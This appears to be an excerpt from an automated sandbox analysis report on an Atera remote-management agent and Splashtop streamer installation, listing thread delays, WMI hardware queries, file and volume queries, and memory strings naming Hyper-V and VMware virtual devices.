                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592484s >= -30000s
                                Source: C:\Windows\Temp\SplashtopStreamer.exe TID: 7388Thread sleep time: -33000s >= -30000s
                                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7536Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00406657 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator,36_2_00406657
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00428B20 _DebugHeapAllocator,_DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,_DebugHeapAllocator,36_2_00428B20
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BBB1E5 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,37_2_00BBB1E5
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599433
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598562
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598344
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597327
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595871
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599778
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599653
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599265
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598706
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598025
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597919
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597483
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597347
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596987
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596745
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596422
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596047
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595655
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595546
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595215
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595030
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594810
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594577
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593806
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592811
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592593
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592484
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2200469566.000002E967D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C28000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2977989591.0000016BEA6C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2200050264.000002E967D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: svchost.exe, 00000023.00000002.2932960901.00000157530BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.FriendlyName("VMware Virtual disk");
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped;l^5Hy
                                Source: AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: svchost.exe, 00000023.00000003.2103876055.000001575321A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
